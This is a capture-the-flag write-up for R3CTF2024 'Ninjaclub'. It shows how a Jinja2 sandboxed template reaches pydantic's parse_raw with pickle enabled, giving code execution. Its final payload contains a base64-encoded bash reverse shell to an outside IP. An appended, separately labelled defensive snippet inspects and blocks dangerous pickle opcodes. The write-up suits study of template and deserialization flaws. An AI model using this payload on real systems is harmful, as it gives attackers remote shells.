R3CTF2024-Ninjaclub-wp-By.Starven

Published 2024-06-13  84 views


Challenge description

image.png

Analysis

The directory structure of the downloaded attachment is as follows:

image.png

Source code:

```python
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import UndefinedError
from fastapi import FastAPI, Form
from fastapi.responses import HTMLResponse
from pydantic import BaseModel
from typing_extensions import Annotated
from typing import Union

app = FastAPI()

class User(BaseModel):
    name: str
    description: Union[str, None] = None
    age: int


class Template(BaseModel):
    source: str

@app.get("/", response_class=HTMLResponse)
def index():
    return """xxx front-end code omitted"""

@app.get("/preview", response_class=HTMLResponse)
def preview_page():
    return """xxx front-end code omitted"""

@app.post("/preview", response_class=HTMLResponse)
def submit_preview(template: Template, user: User):
    # The user-supplied template is rendered in Jinja2's sandbox, with the
    # pydantic User instance (a model object, not a plain dict) exposed as `user`.
    env = SandboxedEnvironment()
    try:
        preview = env.from_string(template.source).render(user=user)
        return preview
    except UndefinedError as e:
        return e
```

Spin the service up locally and debug it:

image.png

When the request comes in, the body is parsed into the BaseModel subclasses that are given as the parameter types, and the resulting User instance is what the template receives as `user`.

Set a breakpoint:

image.png
image.png
image.png

Here it goes straight into pickle.load.

payload:

```json
{
"user":{"name":"John","description":"aaa","age":"18"},
"template":{"source":"exp"}
}
```

exp:

```
user.parse_raw(b=\"cmd\",allow_pickle=true,content_type='pickle')
```

cmd:

```
(S'command to execute'\nios\nsystem\n.
```

Final payload:

```json
{"user":{"name":"John","description":"","age":"18"},"template":{"source":"{{user.parse_raw(b=\"(S'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjI1MC4xNDQvODA4MCAwPiYx|base64 -d|bash -i'\nios\nsystem\n.\",allow_pickle=true,content_type=\"Protocol.pickle\")}}"}}
```
image.png
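Added example, not part of this write-up: the `cmd` above is a protocol-0 pickle whose `i` (INST) opcode resolves `os.system` at load time, which is why any `allow_pickle` path over attacker bytes is code execution. The snippet below, using only the standard library, walks a pickle's opcode stream with `pickletools` without executing it, reports which globals it would import (INST as in the write-up, plus the GLOBAL and STACK_GLOBAL forms), and gates loading through an Unpickler whose `find_class` refuses everything; all sample bytes are constructed and are only inspected, never run.

```python
import io
import pickle
import pickletools

# Constructed sample in the same protocol-0 shape as the write-up's cmd:
# MARK, STRING, INST os system, STOP. It is only inspected, never executed.
SAMPLE = b"(S'echo constructed-sample'\nios\nsystem\n."
# Constructed benign pickle: plain data, no global references at all.
BENIGN = pickle.dumps({"name": "John", "age": 18})
# Constructed pickle of a function reference (STACK_GLOBAL form, protocol 4+).
GLOBAL_REF = pickle.dumps(pickletools.genops)

# Opcodes that let the unpickler import or call code while loading.
DANGEROUS = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
             "REDUCE", "BUILD"}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

def inspect_pickle(data: bytes) -> list:
    """Statically list the module.name globals a pickle would resolve."""
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            # Both carry 'module name' as one space-separated argument.
            module, name = arg.split(" ", 1)
            refs.append(f"{module}.{name}")
        elif op.name == "STACK_GLOBAL":
            # Module and name are the two most recent strings pushed.
            refs.append(f"{strings[-2]}.{strings[-1]}")
    return refs

class RestrictedUnpickler(pickle.Unpickler):
    """Plain-data pickles never need find_class, so refuse every lookup."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def try_safe_loads(data: bytes):
    """Return ('ok', obj) or ('rejected', reason) for untrusted pickle bytes."""
    bad = sorted({op.name for op, _, _ in pickletools.genops(data)
                  if op.name in DANGEROUS})
    if bad:
        return "rejected", f"code-loading opcodes {bad}: {inspect_pickle(data)}"
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)
```

Calling `try_safe_loads` on each of the three constructed blobs rejects the first and third and returns the dict for the benign one.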

Flag

R3CTF{D0CuM3NTa7lOn_l5_Ur_63st_1RieND_434eaea8aa0a}
